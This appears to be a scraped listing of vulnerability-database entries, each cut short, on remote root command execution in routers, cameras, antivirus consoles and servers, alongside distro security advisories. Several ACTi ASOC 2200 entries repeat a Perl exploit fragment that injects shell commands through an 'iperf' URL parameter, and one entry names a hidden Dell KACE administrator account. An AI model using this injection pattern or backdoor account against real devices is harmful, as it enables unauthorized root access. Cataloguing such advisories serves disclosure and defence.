DD-WRT v24-sp1 - (CSRF) Cross Site Reference Forgery Exploit

No description provided by source. Remote root dd-wrt -------------------------------------------------------------------------------- Written by Michael Brooks Special thanks to str0ke Exploits tested on the newist stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...

ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution

No description provided by source. !perl ACTi ASOC 2200 Web Configurator = v2.6 Remote Root Command Execution Dicovery & Author: Todor Donev Author mail: todor.donev@@gmail.com Type: Hardware Vuln Type and Risk: Remote / High ACTi Corporation is the technology leader in IP surveillance, focusing ...

MGASA-2013-0327 Updated torque packages fix CVE-2013-4495

Updated torque packages fix security vulnerability: A user could submit executable shell commands on the tail of what is passed with the -M switch for qsub. This was later passed to a pipe, making it possible for these commands to be executed as root on the pbsserver CVE-2013-4495...

Sun SPARC Enterprise T5120 and T5220 Default Configuration Root Command Execution

The remote Sun SPARC Enterprise Server has been mistakenly shipped with factory settings in the pre-installed Solaris 10 image which configures the remote SSH server insecurely. As a result, local or remote users may leverage these misconfigurations to execute arbitrary commands with the privileg...

Zoom X4/X5 ADSL Modem and Router -Unauthenticated Remote Root Command Execution

Vulnerable Products - Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R620 Server All GS Firmware versions Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R620 Server All GS Firmware versions Note: A similar vulnerability was reported several years ag...

Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution

!/usr/bin/python +--------------------------------------------------------------------------------------------------------------------------------+ Exploit Title : Ubiquiti AirOS 0x90.nl Software link : http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin Vendor site :...

SuSE 11.1 Security Update : glibc (SAT Patch Number 4944)

The implementation of the blowfish based password hashing method had a bug affecting passwords that contain 8bit characters e.g. umlauts. Affected passwords are potentially faster to crack via brute-force methods. CVE-2011-2483 SUSE's crypt implementation supports the blowfish password hashing...

OP5 license.php Remote Command Execution

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'OP5 license.php...

OP5 license.php Remote Command Execution

This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...

Dell KACE K2000 Web Backdoor Account

Nessus was able to log into the remote Dell KACE K2000 system using a hidden account. The hidden account, 'kbox1248163264128256', also has administrator privileges. A remote, unauthenticated attacker could exploit this issue to gain administrative access to the K2000 device. After gaining...

ACTi ASOC 2200 Web Configurator <= v2.6 Root Command Execution

Exploit for hardware platform in category remote exploits !perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not...

ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution

ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution !perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not...

ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution

!perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not Vulnerable\n";...

MicroWorld eScan Antivirus Remote Root Command Execution

!/usr/bin/env python import sys from socket import auther: Mohammed almutairi [email protected] """ MicroWorld eScan Antivirus 1 if $POST'forgot' == "Send Password" $user = $POST"uname"; 2 insecure: vulnerable code in forgotpassword.php and commonfunctions.php in 1 $runasroot =...

Microworld eScan AntiVirus &lt; 3.x - Remote Code Execution

!/usr/bin/env python import sys from socket import auther: Mohammed almutairi [email protected] """ MicroWorld eScan Antivirus 1 if $POST'forgot' == "Send Password" $user = $POST"uname"; 2 insecure: vulnerable code in forgotpassword.php and commonfunctions.php in 1 $runasroot =...

FreeBSD ZFS ZIL不安全文件权限漏洞

Bugraq ID: 37657 FreeBSD是一款基于BSD的操作系统。 FreeBSD ZFS存在安全漏洞，本地攻击者可以利用漏洞获得敏感信息或提升特权。 当重播setattr事务时，重播代码默认会以不安全的权限设置属性，当记录这些事务信息时没有再次更改这些属性。 系统崩溃或掉电等情况下会把部分文件以07777属性设置。这可导致获得敏感信息或提升特权。 FreeBSD FreeBSD 8.0-STABLE FreeBSD FreeBSD 8.0-RELEASE FreeBSD FreeBSD 7.2-STABLE FreeBSD FreeBSD 7.1-STABLE FreeBSD...

Multiple XSRF in DD-WRT &#40;Remote Root Command Execution&#41;

Author: Michael Brooks !!!! I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless, even to someone trying to write a patch! You also tend to get the wrong name! Michael Brooks wrote this! Exploits...

DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit

No description provided by source. Remote root dd-wrt -------------------------------------------------------------------------------- Written by Michael Brooks Special thanks to str0ke Exploits tested on the newist stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...

CVE-2004-2270

Unknown vulnerability in IBM Parallel Environment PE 3.2 and 4.1 allows attackers to execute arbitrary commands as root via unknown vectors in the sample code...

[Full-disclosure] MA[2005-0712b] - &#39;Nokia Affix Bluetooth btsrv/btobex poor use of system&#40;&#41;&#39;

DMA2005-0712b - 'Nokia Affix Bluetooth btsrv/btobex poor use of system' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA2005-0712b.txt Description: Affix is a Bluetooth Protocol Stack for...